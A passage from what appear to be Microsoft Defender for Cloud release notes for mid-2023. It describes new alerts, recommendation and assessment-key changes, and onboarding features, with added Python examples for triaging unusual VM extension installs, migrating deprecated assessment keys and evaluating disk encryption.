the GPU card and perform cryptojacking. 


Alert: Suspicious installation of GPU extension in your virtual machine (Preview)
Alert type: VM_GPUDriverExtensionUnusualExecution
Description: Suspicious installation of a GPU extension was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Attackers may use the GPU driver extension to install GPU drivers on your virtual machine via the Azure Resource Manager to perform cryptojacking.
Severity: Low
MITRE tactic: Impact


For a complete list of alerts, see the reference table for all security alerts in Microsoft 
Defender for Cloud. 
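The GPU driver alert and the extension-based alerts in the August table above all rest on one signal: an Azure Resource Manager write of a virtual machine extension by a principal whose pattern of installations is unusual, either because it has never deployed that extension family before or because it deploys many in a short time. The Python script below is an added example, not Microsoft's detection logic (which is not published), that reproduces that signal over constructed Activity Log style events. The event shape is a simplified assumption: the real write event carries the operation, caller, status and resource ID, while the extension publisher/type would have to be joined in from the extension resource. The per-principal baseline is constructed as well. The publisher/type strings are the well-known identifiers of those extensions; check them against your own extension inventory before reusing the table.

```python
"""Triage Azure Resource Manager extension writes for the two signals the
extension-based alerts above rely on: a principal deploying an extension
family it has not used before, and a burst of installations across VMs."""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Extension families named in the alerts above, keyed by publisher/type, with
# the MITRE tactic each alert assigns; verify the identifiers in your inventory.
WATCHED_EXTENSIONS = {
    "Microsoft.Compute/VMAccessAgent": ("VM Access", "Persistence"),
    "Microsoft.Compute/CustomScriptExtension": ("Custom script", "Execution"),
    "Microsoft.Azure.Extensions/CustomScript": ("Custom script", "Execution"),
    "Microsoft.Powershell/DSC": ("DSC", "Execution"),
    "Microsoft.Azure.Security/AzureDiskEncryption": ("Disk encryption", "Impact"),
    "Microsoft.HpcCompute/NvidiaGpuDriverWindows": ("GPU driver", "Impact"),
    "Microsoft.HpcCompute/NvidiaGpuDriverLinux": ("GPU driver", "Impact"),
    "Microsoft.Azure.Monitor/AzureMonitorLinuxAgent": ("Monitoring", "Reconnaissance"),
    "Microsoft.Azure.Monitor/AzureMonitorWindowsAgent": ("Monitoring", "Reconnaissance"),
}
EXTENSION_WRITE = "Microsoft.Compute/virtualMachines/extensions/write"
VM_PREFIX = "/subscriptions/s1/resourceGroups/rg/providers/Microsoft.Compute/virtualMachines/"


def event(time, caller, vm, ext=None, status="Succeeded"):
    """Build one constructed event. The field set is a simplified assumption: the
    real Activity Log write event carries operation, caller, status and resourceId;
    the extension publisher/type is joined in here as extensionType."""
    if ext is None:   # an unrelated VM operation, included to show it is ignored
        return {"time": time, "caller": caller, "status": status, "extensionType": None,
                "operation": "Microsoft.Compute/virtualMachines/start/action",
                "resourceId": VM_PREFIX + vm}
    return {"time": time, "caller": caller, "status": status, "extensionType": ext,
            "operation": EXTENSION_WRITE,
            "resourceId": VM_PREFIX + vm + "/extensions/" + ext.split("/")[1]}


# Constructed sample export, one JSON object per line.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    event("2023-08-01T09:00:00Z", "ops-automation@contoso.com", "vm-01",
          "Microsoft.Azure.Monitor/AzureMonitorLinuxAgent"),
    event("2023-08-01T09:02:00Z", "ops-automation@contoso.com", "vm-01"),
    event("2023-08-01T09:05:00Z", "contractor@contoso.com", "vm-02",
          "Microsoft.Compute/VMAccessAgent"),
    event("2023-08-01T09:07:00Z", "contractor@contoso.com", "vm-03",
          "Microsoft.Azure.Security/AzureDiskEncryption"),
    event("2023-08-01T09:09:00Z", "contractor@contoso.com", "vm-04",
          "Microsoft.Azure.Security/AzureDiskEncryption"),
    event("2023-08-01T09:12:00Z", "contractor@contoso.com", "vm-05",
          "Microsoft.Compute/CustomScriptExtension", status="Failed"),
])

# Extension families each principal deployed before the examined window
# (constructed); anything not listed is "not commonly seen" for that principal.
BASELINE = {"ops-automation@contoso.com": {"Monitoring"}}


def parse_events(text):
    """Parse a JSON-lines export into time-sorted events with the VM name split out."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ev["time"] = datetime.fromisoformat(ev["time"].replace("Z", "+00:00"))
        ev["vm"] = ev["resourceId"].split("/extensions/")[0].rsplit("/", 1)[-1]
        events.append(ev)
    return sorted(events, key=lambda e: e["time"])


def triage(events, baseline, burst_threshold=3, window=timedelta(hours=1)):
    """Return findings for successful writes of watched extensions: 'first_seen'
    when the principal never deployed that family before (behavior departs from
    its usual pattern) and 'burst' when it touched >= burst_threshold distinct
    VMs within `window` (a high number of extension installations)."""
    findings = []
    seen = defaultdict(set, {c: set(f) for c, f in baseline.items()})
    recent = defaultdict(list)  # caller -> [(time, vm, tactic)] of watched installs
    burst_flagged = set()
    for ev in events:
        if ev["operation"] != EXTENSION_WRITE or ev["status"] != "Succeeded":
            continue
        watched = WATCHED_EXTENSIONS.get(ev["extensionType"])
        if watched is None:
            continue
        family, tactic = watched
        caller = ev["caller"]
        if family not in seen[caller]:
            findings.append({"rule": "first_seen", "caller": caller, "family": family,
                             "tactics": [tactic], "vms": [ev["vm"]]})
        seen[caller].add(family)
        recent[caller] = [r for r in recent[caller] if ev["time"] - r[0] <= window]
        recent[caller].append((ev["time"], ev["vm"], tactic))
        vms = sorted({r[1] for r in recent[caller]})
        if len(vms) >= burst_threshold and caller not in burst_flagged:
            burst_flagged.add(caller)
            findings.append({"rule": "burst", "caller": caller, "family": None,
                             "tactics": sorted({r[2] for r in recent[caller]}), "vms": vms})
    return findings
```

Running `triage(parse_events(SAMPLE_LOG), BASELINE)` on the constructed data yields three findings, all for the contractor principal: a first-seen VM Access install, a first-seen disk encryption install, and a burst across three VMs inside the hour. The automation account's monitoring-agent install is in its baseline and produces nothing, and the failed custom script write is skipped, which is the trade-off to revisit if you also want failed extension runs as a signal.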


Support for disabling specific vulnerability findings 
July 9, 2023 


Release of support for disabling vulnerability findings for your container registry images 
or running images as part of agentless container posture. If you have an organizational 
need to ignore a vulnerability finding on your container registry image, rather than 
remediate it, you can optionally disable it. Disabled findings don't affect your secure 
score or generate unwanted noise. 


Learn how to disable vulnerability assessment findings on Container registry images. 


Data Aware Security Posture is now Generally Available 


July 1, 2023 


Data-aware security posture in Microsoft Defender for Cloud is now Generally Available.


It helps customers to reduce data risk, and respond to data breaches. Using data-aware security posture you can:


• Automatically discover sensitive data resources across Azure and AWS.
• Evaluate data sensitivity, data exposure, and how data flows across the organization.
• Proactively and continuously uncover risks that might lead to data breaches.
• Detect suspicious activities that might indicate ongoing threats to sensitive data resources.


For more information, see Data-aware security posture in Microsoft Defender for Cloud. 


June 2023 


Updates in June include: 


June 26: Streamlined multicloud account onboarding with enhanced settings
June 25: Private Endpoint support for Malware Scanning in Defender for Storage
June 21: Recommendation released for preview: Running container images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management)
June 15: Control updates were made to the NIST 800-53 standards in regulatory compliance
June 11: Planning of cloud migration with an Azure Migrate business case now includes Defender for Cloud
June 7: Express configuration for vulnerability assessments in Defender for SQL is now Generally Available
June 6: More scopes added to existing Azure DevOps Connectors
June 5: Onboarding directly (without Azure Arc) to Defender for Servers is now Generally Available
June 4: Replacing agent-based discovery with agentless discovery for containers capabilities in Defender CSPM


Streamlined multicloud account onboarding with 
enhanced settings 


June 26, 2023 


Defender for Cloud has improved the onboarding experience to include a new streamlined user interface and instructions in addition to new capabilities that allow you to onboard your AWS and GCP environments while providing access to advanced onboarding features.


For organizations that have adopted HashiCorp Terraform for automation, Defender for Cloud now includes the ability to use Terraform as the deployment method alongside AWS CloudFormation or GCP Cloud Shell. You can now customize the required role names when creating the integration. You can also select between:


• Default access - Allows Defender for Cloud to scan your resources and automatically include future capabilities.
• Least privileged access - Grants Defender for Cloud access only to the current permissions needed for the selected plans.


If you select least privileged access, you'll receive notifications on the connector health page about any new roles and permissions that are required to get full functionality.


Defender for Cloud allows you to distinguish between your cloud accounts by their native names from the cloud vendors, for example AWS account aliases and GCP project names.


Private Endpoint support for Malware Scanning in 
Defender for Storage 


June 25, 2023 


Private Endpoint support is now available as part of the Malware Scanning public 
preview in Defender for Storage. This capability allows enabling Malware Scanning on 
storage accounts that are using private endpoints. No other configuration is needed. 


Malware Scanning (Preview) in Defender for Storage helps protect your storage 
accounts from malicious content by performing a full malware scan on uploaded 
content in near real-time, using Microsoft Defender Antivirus capabilities. It's designed 
to help fulfill security and compliance requirements for handling untrusted content. It's 
an agentless SaaS solution that allows simple setup at scale, with zero maintenance, and 
supports automating response at scale. 


Private endpoints provide secure connectivity to your Azure Storage services, effectively 
eliminating public internet exposure, and are considered a security best practice. 


For storage accounts with private endpoints that have Malware Scanning already enabled, you'll need to disable and enable the plan with Malware Scanning for this to work.


Learn more about using private endpoints in Defender for Storage and how to secure 
your storage services further. 


Recommendation released for preview: Running 
container images should have vulnerability findings 
resolved (powered by Microsoft Defender Vulnerability 
Management) 


June 21, 2023 


A new container recommendation in Defender CSPM powered by MDVM is released for preview:

Recommendation: Running container images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management) (Preview)
Description: Container image vulnerability assessment scans your registry for commonly known vulnerabilities (CVEs) and provides a detailed vulnerability report for each image. This recommendation provides visibility to vulnerable images currently running in your Kubernetes clusters. Remediating vulnerabilities in container images that are currently running is key to improving your security posture, significantly reducing the attack surface for your containerized workloads.
Assessment key: c609cf0f-71ab-41e9-a3c6-9a1f7fe1b8d5


This new recommendation replaces the current recommendation of the same name, powered by Qualys, only in Defender CSPM (replacing assessment key 41503391-efa5-47ee-9282-4eff6131462c).


Control updates were made to the NIST 800-53 standards 
in regulatory compliance 


June 15, 2023 


The NIST 800-53 standards (both R4 and R5) have recently been updated with control 
changes in Microsoft Defender for Cloud regulatory compliance. The Microsoft- 
managed controls have been removed from the standard, and the information on the 
Microsoft responsibility implementation (as part of the cloud shared responsibility 
model) is now available only in the control details pane under Microsoft Actions. 


These controls were previously calculated as passed controls, so you may see a 
significant dip in your compliance score for NIST standards between April 2023 and May 
2023. 


For more information on compliance controls, see Tutorial: Regulatory compliance 
checks - Microsoft Defender for Cloud. 


Planning of cloud migration with an Azure Migrate 
business case now includes Defender for Cloud 


June 11, 2023 


Now you can discover potential cost savings in security by applying Defender for Cloud 
within the context of an Azure Migrate business case. 


Express configuration for vulnerability assessments in 
Defender for SQL is now Generally Available 


June 7, 2023 


Express configuration for vulnerability assessments in Defender for SQL is now Generally Available. Express configuration provides a streamlined onboarding experience for SQL vulnerability assessments by using a one-click configuration (or an API call). There are no extra settings or dependencies on managed storage accounts needed.


Check out this blog to learn more about express configuration.


You can learn the differences between express and classic configuration.


More scopes added to existing Azure DevOps Connectors 
June 6, 2023 


Defender for DevOps added the following extra scopes to the Azure DevOps (ADO) application:


• Advanced Security management: vso.advsec_manage. Needed in order to allow you to enable, disable and manage GitHub Advanced Security for ADO.
• Container Mapping: vso.extension_manage, vso.gallery_manager. Needed in order to allow you to share the decorator extension with the ADO organization.


Only new Defender for DevOps customers that are trying to onboard ADO resources to 
Microsoft Defender for Cloud are affected by this change. 


Onboarding directly (without Azure Arc) to Defender for 
Servers is now Generally Available 


June 5, 2023 


Previously, Azure Arc was required to onboard non-Azure servers to Defender for 
Servers. However, with the latest release you can also onboard your on-premises servers 
to Defender for Servers using only the Microsoft Defender for Endpoint agent. 


This new method simplifies the onboarding process for customers focused on core 
endpoint protection and allows you to take advantage of Defender for Servers’ 
consumption-based billing for both cloud and noncloud assets. The direct onboarding 
option via Defender for Endpoint is available now, with billing for onboarded machines 
starting on July 1. 


For more information, see Connect your non-Azure machines to Microsoft Defender for Cloud with Defender for Endpoint.


Replacing agent-based discovery with agentless 
discovery for containers capabilities in Defender CSPM 


June 4, 2023 


With Agentless Container Posture capabilities available in Defender CSPM, the agent- 
based discovery capabilities are now retired. If you currently use container capabilities 
within Defender CSPM, please make sure that the relevant extensions are enabled to 
continue receiving container-related value of the new agentless capabilities such as 
container-related attack paths, insights, and inventory. (It can take up to 24 hours to see 
the effects of enabling the extensions). 


Learn more about agentless container posture. 


May 2023 


Updates in May include: 


• New alert in Defender for Key Vault
• Agentless scanning now supports encrypted disks in AWS
• Revised JIT (Just-In-Time) rule naming conventions in Defender for Cloud
• Onboard selected AWS regions
• Multiple changes to identity recommendations
• Deprecation of legacy standards in compliance dashboard
• Two Defender for DevOps recommendations now include Azure DevOps scan findings
• New default setting for Defender for Servers vulnerability assessment solution
• Download a CSV report of your cloud security explorer query results (Preview)
• Release of containers Vulnerability Assessment powered by Microsoft Defender Vulnerability Management (MDVM) in Defender CSPM
• Renaming container recommendations powered by Qualys
• Defender for DevOps GitHub Application update
• Defender for DevOps Pull Request annotations in Azure DevOps repositories now includes Infrastructure as Code misconfigurations


New alert in Defender for Key Vault 


Alert: Unusual access to the key vault from a suspicious IP (Non-Microsoft or External)
Alert type: KV_UnusualAccessSuspiciousIP
Description: A user or service principal has attempted anomalous access to key vaults from a non-Microsoft IP in the last 24 hours. This anomalous access pattern may be legitimate activity. It could be an indication of a possible attempt to gain access of the key vault and the secrets contained within it. We recommend further investigations.
MITRE tactics: Credential Access
Severity: Medium


For all of the available alerts, see Alerts for Azure Key Vault. 


Agentless scanning now supports encrypted disks in AWS 


Agentless scanning for VMs now supports processing of instances with encrypted disks 
in AWS, using both CMK and PMK. 


This extended support increases coverage and visibility over your cloud estate without 
impacting your running workloads. Support for encrypted disks maintains the same zero 
impact method on running instances. 


• For new customers enabling agentless scanning in AWS - encrypted disks coverage is built in and supported by default.
• For existing customers that already have an AWS connector with agentless scanning enabled, you need to reapply the CloudFormation stack to your onboarded AWS accounts to update and add the new permissions that are required to process encrypted disks. The updated CloudFormation template includes new assignments that allow Defender for Cloud to process encrypted disks.


You can learn more about the permissions used to scan AWS instances.

To re-apply your CloudFormation stack:


1. Go to Defender for Cloud environment settings and open your AWS connector.
2. Navigate to the Configure Access tab.
3. Select Click to download the CloudFormation template.
4. Navigate to your AWS environment and apply the updated template.


Learn more about agentless scanning and enabling agentless scanning in AWS. 


Revised JIT (Just-In-Time) rule naming conventions in 
Defender for Cloud 


We revised the JIT (Just-In-Time) rules to align with the Microsoft Defender for Cloud 
brand. We changed the naming conventions for Azure Firewall and NSG (Network 
Security Group) rules. 


The changes are listed as follows: 


Description: JIT rule names (allow and deny) in NSG (Network Security Group)
Old name: SecurityCenter-JITRule
New name: MicrosoftDefenderForCloud-JITRule

Description: JIT rule descriptions in NSG
Old name: ASC JIT Network Access rule
New name: MDC JIT Network Access rule

Description: JIT firewall rule collection names
Old name: ASC-JIT
New name: MDC-JIT

Description: JIT firewall rule names
Old name: ASC-JIT
New name: MDC-JIT


Learn how to secure your management ports with Just-In-Time access. 


Onboard selected AWS regions 


To help you manage your AWS CloudTrail costs and compliance needs, you can now select which AWS regions to scan when you add or edit a cloud connector. You can now scan selected specific AWS regions or all available regions (default), when you onboard your AWS accounts to Defender for Cloud. Learn more at Connect your AWS account to Microsoft Defender for Cloud.


Multiple changes to identity recommendations 


The following recommendations are now released as General Availability (GA) and are replacing the V1 recommendations, which are now deprecated.


General Availability (GA) release of identity recommendations V2

The V2 release of identity recommendations introduces the following enhancements:


• The scope of the scan has been expanded to include all Azure resources, not just subscriptions, which enables security administrators to view role assignments per account.
• Specific accounts can now be exempted from evaluation. Accounts such as break glass or service accounts can be excluded by security administrators.
• The scan frequency has been increased from 24 hours to 12 hours, thereby ensuring that the identity recommendations are more up-to-date and accurate.


The following security recommendations are available in GA and replace the V1 recommendations:


Recommendation: Accounts with owner permissions on Azure resources should be MFA enabled
Assessment key: 6240402e-f77c-46fa-9060-a7ce53997754

Recommendation: Accounts with write permissions on Azure resources should be MFA enabled
Assessment key: c0cb17b2-0607-48a7-b0e0-903ed22de39b

Recommendation: Accounts with read permissions on Azure resources should be MFA enabled
Assessment key: dabc9bc4-b8a8-45bd-9a5a-43000df8aa1c

Recommendation: Guest accounts with owner permissions on Azure resources should be removed
Assessment key: 20606e75-05c4-48c0-9d97-add6daa2109a

Recommendation: Guest accounts with write permissions on Azure resources should be removed
Assessment key: 0354476c-a12a-4fcc-a79d-f0ab7ffffdbb

Recommendation: Guest accounts with read permissions on Azure resources should be removed
Assessment key: fde1c0c9-0fd2-4ecc-87b5-98956cbc1095

Recommendation: Blocked accounts with owner permissions on Azure resources should be removed
Assessment key: 050ac097-3dda-4d24-ab6d-82568e7a50cf

Recommendation: Blocked accounts with read and write permissions on Azure resources should be removed
Assessment key: 1ff0b4c9-ed56-4de6-be9c-d7ab39645926


Deprecation of identity recommendations V1


The following security recommendations are now deprecated:


Recommendation: MFA should be enabled on accounts with owner permissions on subscriptions
Assessment key: 94290b00-4d0c-d7b4-7cea-064a9554e681

Recommendation: MFA should be enabled on accounts with write permissions on subscriptions
Assessment key: 57e98606-6b1e-6193-0e3d-fe621387c16b

Recommendation: MFA should be enabled on accounts with read permissions on subscriptions
Assessment key: 151e82c5-5341-a74b-1eb0-bc38d2c84bb5

Recommendation: External accounts with owner permissions should be removed from subscriptions
Assessment key: c3b6ae71-f1f0-31b4-e6c1-d5951285d03d

Recommendation: External accounts with write permissions should be removed from subscriptions
Assessment key: 04e7147b-0deb-9796-2e5c-0336343ceb3d

Recommendation: External accounts with read permissions should be removed from subscriptions
Assessment key: a8c6a4ad-d51e-88fe-2979-d3ee3c864f8b

Recommendation: Deprecated accounts with owner permissions should be removed from subscriptions
Assessment key: e52064aa-6853-e252-a11e-dffc675689c2

Recommendation: Deprecated accounts should be removed from subscriptions
Assessment key: 00c6d40b-e990-6acf-d4f3-471e747a27c4


We recommend updating your custom scripts, workflows, and governance rules to correspond with the V2 recommendations.
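To act on that recommendation, the Python script below, an added example that is not part of Microsoft's documentation, scans an automation artifact for the deprecated V1 assessment keys and rewrites them to the V2 keys. The artifact here is a constructed Azure Resource Graph query against securityresources, where an assessment's resource name is its assessment key, but the same scan works on workflow JSON or governance rule exports because it only needs the text. The V1 to V2 pairing is assumed from the matching row order of the two tables above (MFA owner/write/read, external to guest owner/write/read, deprecated to blocked owner and read+write); confirm it against your tenant before running the rewrite across a repository.

```python
"""Find deprecated V1 identity-recommendation assessment keys in automation
artifacts and rewrite them to the V2 keys listed in the tables above."""
import re

# V1 -> V2 assessment keys, paired by the row order of the two tables above.
# The pairing is an assumption drawn from that order; verify it before use.
V1_TO_V2 = {
    "94290b00-4d0c-d7b4-7cea-064a9554e681": "6240402e-f77c-46fa-9060-a7ce53997754",  # MFA, owner
    "57e98606-6b1e-6193-0e3d-fe621387c16b": "c0cb17b2-0607-48a7-b0e0-903ed22de39b",  # MFA, write
    "151e82c5-5341-a74b-1eb0-bc38d2c84bb5": "dabc9bc4-b8a8-45bd-9a5a-43000df8aa1c",  # MFA, read
    "c3b6ae71-f1f0-31b4-e6c1-d5951285d03d": "20606e75-05c4-48c0-9d97-add6daa2109a",  # external -> guest, owner
    "04e7147b-0deb-9796-2e5c-0336343ceb3d": "0354476c-a12a-4fcc-a79d-f0ab7ffffdbb",  # external -> guest, write
    "a8c6a4ad-d51e-88fe-2979-d3ee3c864f8b": "fde1c0c9-0fd2-4ecc-87b5-98956cbc1095",  # external -> guest, read
    "e52064aa-6853-e252-a11e-dffc675689c2": "050ac097-3dda-4d24-ab6d-82568e7a50cf",  # deprecated -> blocked, owner
    "00c6d40b-e990-6acf-d4f3-471e747a27c4": "1ff0b4c9-ed56-4de6-be9c-d7ab39645926",  # deprecated -> blocked, read+write
}

# Assessment keys are GUIDs; match whole GUIDs only, so a key that is part of a
# longer hex run is never partially rewritten. Case-insensitive because exports
# and hand-written queries mix cases.
GUID_RE = re.compile(r"\b[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}\b", re.IGNORECASE)

# Constructed Azure Resource Graph query of the kind a custom workflow might run:
# in securityresources, an assessment's resource name is its assessment key.
SAMPLE_QUERY = """
securityresources
| where type == "microsoft.security/assessments"
| where name in~ ("94290b00-4d0c-d7b4-7cea-064a9554e681",
                  "C3B6AE71-F1F0-31B4-E6C1-D5951285D03D")
| where properties.status.code == "Unhealthy"
| project subscriptionId, name, properties.displayName
"""


def find_v1_keys(text):
    """Return the sorted, lower-cased V1 keys still referenced in text."""
    return sorted({m.group(0).lower() for m in GUID_RE.finditer(text)
                   if m.group(0).lower() in V1_TO_V2})


def migrate(text):
    """Rewrite every V1 key in text to its V2 key.

    Returns (new_text, replacements) where replacements is the ordered list of
    (old_key, new_key) pairs that were applied, for the change record."""
    replacements = []

    def swap(match):
        old = match.group(0).lower()
        new = V1_TO_V2.get(old)
        if new is None:
            return match.group(0)   # some other GUID, leave it untouched
        replacements.append((old, new))
        return new

    return GUID_RE.sub(swap, text), replacements


if __name__ == "__main__":
    migrated, changes = migrate(SAMPLE_QUERY)
    for old, new in changes:
        print(f"{old} -> {new}")
    print(migrated)
```

Point `migrate` at each file in a repository and commit the returned change list with the diff; a non-empty `find_v1_keys` result after migration means a key appeared in a form the GUID pattern did not match (for example split across lines) and needs a manual look.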


Deprecation of legacy standards in compliance 
dashboard 


Legacy PCI DSS v3.2.1 and legacy SOC TSP have been fully deprecated in the Defender for Cloud compliance dashboard, and replaced by SOC 2 Type 2 initiative and PCI DSS v4 initiative-based compliance standards. We have fully deprecated support of PCI DSS standard/initiative in Microsoft Azure operated by 21Vianet.


Learn how to customize the set of standards in your regulatory compliance dashboard. 


Two Defender for DevOps recommendations now include 
Azure DevOps scan findings 


Defender for DevOps Code and IaC has expanded its recommendation coverage in Microsoft Defender for Cloud to include Azure DevOps security findings for the following two recommendations:

• Code repositories should have code scanning findings resolved
• Code repositories should have infrastructure as code scanning findings resolved


Previously, coverage for Azure DevOps security scanning only included the secrets recommendation.


Learn more about Defender for DevOps. 


New default setting for Defender for Servers vulnerability 
assessment solution 


Vulnerability assessment (VA) solutions are essential to safeguard machines from 
cyberattacks and data breaches. 


Microsoft Defender Vulnerability Management (MDVM) is now enabled as the default, 
built-in solution for all subscriptions protected by Defender for Servers that don't 
already have a VA solution selected. 


If a subscription has a VA solution enabled on any of its VMs, no changes are made and 
MDVM won't be enabled by default on the remaining VMs in that subscription. You can 
choose to enable a VA solution on the remaining VMs on your subscriptions. 


Learn how to Find vulnerabilities and collect software inventory with agentless scanning (Preview).


Download a CSV report of your cloud security explorer
query results (Preview)


Defender for Cloud has added the ability to download a CSV report of your cloud 
security explorer query results. 


After your run a search for a query, you can select the Download CSV report (Preview) 
button from the Cloud Security Explorer page in Defender for Cloud. 


Learn how to build queries with cloud security explorer 


Release of containers Vulnerability Assessment powered 
by Microsoft Defender Vulnerability Management 
(MDVM) in Defender CSPM 


We're announcing the release of Vulnerability Assessment for Linux images in Azure container registries powered by Microsoft Defender Vulnerability Management (MDVM) in Defender CSPM. This release includes daily scanning of images. Findings used in the Security Explorer and attack paths rely on MDVM Vulnerability Assessment instead of the Qualys scanner.

The existing recommendation Container registry images should have vulnerability findings resolved is replaced by a new recommendation powered by MDVM:

Recommendation: Container registry images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management)
Description: Container image vulnerability assessment scans your registry for commonly known vulnerabilities (CVEs) and provides a detailed vulnerability report for each image. This recommendation provides visibility to vulnerable images currently running in your Kubernetes clusters. Remediating vulnerabilities in container images that are currently running is key to improving your security posture, significantly reducing the attack surface for your containerized workloads.
Assessment key: dbd0cb49-b563-45e7-9724-889e799fa648 is replaced by c0b7cfc6-3172-465a-b378-53c7ff2cc0d5


Learn more about Agentless Containers Posture in Defender CSPM. 


Learn more about Microsoft Defender Vulnerability Management (MDVM). 


Renaming container recommendations powered by 
Qualys 


The current container recommendations in Defender for Containers will be renamed as 
follows: 


Recommendation: Container registry images should have vulnerability findings resolved (powered by Qualys)
Description: Container image vulnerability assessment scans your registry for security vulnerabilities and exposes detailed findings for each image. Resolving the vulnerabilities can greatly improve your containers' security posture and protect them from attacks.
Assessment key: dbd0cb49-b563-45e7-9724-889e799fa648

Recommendation: Running container images should have vulnerability findings resolved (powered by Qualys)
Description: Container image vulnerability assessment scans container images running on your Kubernetes clusters for security vulnerabilities and exposes detailed findings for each image. Resolving the vulnerabilities can greatly improve your containers' security posture and protect them from attacks.
Assessment key: 41503391-efa5-47ee-9282-4eff6131462c


Defender for DevOps GitHub Application update 


Microsoft Defender for DevOps is constantly making changes and updates that require 
Defender for DevOps customers who have onboarded their GitHub environments in 
Defender for Cloud to provide permissions as part of the application deployed in their 
GitHub organization. These permissions are necessary to ensure all of the security 
features of Defender for DevOps operate normally and without issues. 


We suggest updating the permissions as soon as possible to ensure continued access to 
all available features of Defender for DevOps. 


Permissions can be granted in two different ways: 


e In your organization, select GitHub Apps. Locate Your organization, and select 
Review request. 


e You'll get an automated email from GitHub Support. In the email, select Review 
permission request to accept or reject this change. 


After you have followed either of these options, you'll be navigated to the review screen 
where you should review the request. Select Accept new permissions to approve the 
request. 


If you require any assistance updating permissions, you can create an Azure support 
request. 


You can also learn more about Defender for DevOps.


Defender for DevOps Pull Request annotations in Azure 
DevOps repositories now includes Infrastructure as Code 
misconfigurations 


Defender for DevOps has expanded its Pull Request (PR) annotation coverage in Azure DevOps to include Infrastructure as Code (IaC) misconfigurations that are detected in Azure Resource Manager and Bicep templates.

Developers can now see annotations for IaC misconfigurations directly in their PRs. Developers can also remediate critical security issues before the infrastructure is provisioned into cloud workloads. To simplify remediation, developers are provided with a severity level, misconfiguration description, and remediation instructions within each annotation.


Previously, coverage for Defender for DevOps PR annotations in Azure DevOps only 
included secrets. 


Learn more about Defender for DevOps and Pull Request annotations. 


April 2023 


Updates in April include:

- Agentless Container Posture in Defender CSPM (Preview)
- New preview Unified Disk Encryption recommendation
- Changes in the recommendation Machines should be configured securely
- Deprecation of App Service language monitoring policies
- New alert in Defender for Resource Manager
- Three alerts in the Defender for Resource Manager plan have been deprecated
- Alerts automatic export to Log Analytics workspace have been deprecated
- Deprecation and improvement of selected alerts for Windows and Linux Servers
- New Azure Active Directory authentication-related recommendations for Azure Data Services
- Two recommendations related to missing Operating System (OS) updates were released to GA
- Defender for APIs (Preview)


Agentless Container Posture in Defender CSPM (Preview) 


The new Agentless Container Posture (Preview) capabilities are available as part of the 
Defender CSPM (Cloud Security Posture Management) plan. 


Agentless Container Posture allows security teams to identify security risks in containers 
and Kubernetes realms. An agentless approach allows security teams to gain visibility 
into their Kubernetes and containers registries across SDLC and runtime, removing 
friction and footprint from the workloads. 


Agentless Container Posture offers container vulnerability assessments that, combined 
with attack path analysis, enable security teams to prioritize and zoom into specific 
container vulnerabilities. You can also use cloud security explorer to uncover risks and 
hunt for container posture insights, such as discovery of applications running vulnerable 
images or exposed to the internet. 


Learn more at Agentless Container Posture (Preview). 


Unified Disk Encryption recommendation (preview) 


We have introduced a unified disk encryption recommendation in public preview, Windows virtual machines should enable Azure Disk Encryption or EncryptionAtHost and Linux virtual machines should enable Azure Disk Encryption or EncryptionAtHost.

These recommendations replace Virtual machines should encrypt temp disks, caches, and data flows between Compute and Storage resources, which detected Azure Disk Encryption, and the policy Virtual machines and virtual machine scale sets should have encryption at host enabled, which detected EncryptionAtHost. ADE and EncryptionAtHost provide comparable encryption at rest coverage, and we recommend enabling one of them on every virtual machine. The new recommendations detect whether either ADE or EncryptionAtHost is enabled and only warn if neither is enabled. We also warn if ADE is enabled on some, but not all, disks of a VM (this condition isn't applicable to EncryptionAtHost).
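The decision rule described above, as an added example that is not Defender for Cloud's own evaluation code: it runs the unified recommendation's logic over constructed VM records. The field names (encryption_at_host, ade_enabled) and the reading that the partial-disk check applies only to ADE are assumptions.

```python
# Added example (not Defender for Cloud's own evaluation code): the decision rule the
# unified disk-encryption recommendation applies, run over constructed VM records.
# Field names such as encryption_at_host and ade_enabled are assumptions for this demo.
from dataclasses import dataclass, field
from typing import Dict, List, Tuple


@dataclass
class Disk:
    name: str
    ade_enabled: bool  # Azure Disk Encryption (ADE) applied to this disk


@dataclass
class VirtualMachine:
    name: str
    os_family: str  # "Windows" or "Linux": selects which of the two recommendations applies
    encryption_at_host: bool  # VM-level EncryptionAtHost setting
    disks: List[Disk] = field(default_factory=list)


def assess(vm: VirtualMachine) -> Tuple[str, str]:
    """Return (status, reason) for one VM.

    Rule from the release note: the VM is healthy when either ADE or EncryptionAtHost is
    enabled; it is flagged when neither is, and also when ADE covers only some of its
    disks. EncryptionAtHost is set per VM, not per disk, so the partial-coverage check
    is only meaningful for ADE (our reading of the note).
    """
    if vm.encryption_at_host:
        return "Healthy", "EncryptionAtHost is enabled"
    encrypted = [d.name for d in vm.disks if d.ade_enabled]
    unencrypted = [d.name for d in vm.disks if not d.ade_enabled]
    if vm.disks and not unencrypted:
        return "Healthy", "ADE is enabled on all disks"
    if encrypted:
        return "Unhealthy", (
            "ADE is enabled on some disks (" + ", ".join(encrypted)
            + ") but not on " + ", ".join(unencrypted)
        )
    return "Unhealthy", "neither ADE nor EncryptionAtHost is enabled"


def recommendation_for(vm: VirtualMachine) -> str:
    """Map a VM to the preview recommendation name that applies to its OS family."""
    return (
        f"{vm.os_family} virtual machines should enable "
        "Azure Disk Encryption or EncryptionAtHost"
    )


def unhealthy_by_recommendation(vms: List[VirtualMachine]) -> Dict[str, List[str]]:
    """Group the names of unhealthy VMs under the recommendation they would appear in."""
    report: Dict[str, List[str]] = {}
    for vm in vms:
        status, _reason = assess(vm)
        if status == "Unhealthy":
            report.setdefault(recommendation_for(vm), []).append(vm.name)
    return report


# Constructed fleet covering every branch of the rule.
FLEET = [
    VirtualMachine("win-eah", "Windows", True, [Disk("os", False), Disk("data1", False)]),
    VirtualMachine("linux-ade-all", "Linux", False, [Disk("os", True), Disk("data1", True)]),
    VirtualMachine("win-ade-partial", "Windows", False, [Disk("os", True), Disk("data1", False)]),
    VirtualMachine("linux-none", "Linux", False, [Disk("os", False)]),
    # EncryptionAtHost on and ADE only partial: compliant, the partial check is ADE-only.
    VirtualMachine("win-both", "Windows", True, [Disk("os", True), Disk("data1", False)]),
]

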